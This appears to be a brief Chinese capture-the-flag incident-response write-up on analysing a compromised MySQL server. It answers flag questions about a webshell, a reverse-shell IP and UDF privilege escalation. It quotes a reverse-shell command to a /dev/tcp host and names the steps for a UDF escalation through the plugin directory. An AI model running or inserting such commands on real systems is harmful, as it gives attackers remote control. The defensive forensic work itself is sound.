第二章-日志分析-Mysql应急响应
1.黑客第一次写入的shell flag{关键字符串}
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}
在/tmp/1.sh
中反弹了shell
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
放到河马查杀,得到sh.php
|
|
根据上面写入webshell
的格式 所以猜测可能是udf
提权
查看源码得到mysql
密码
|
|
show variables like '%plugin%';
cd /usr/lib/mysql/plugin/
得到 udf.so
ps -aux
查看mysql服务是以什么用户启动的
因为是mysql
用户启动,所以提权后也是mysql
用户的权限
flag{mysql}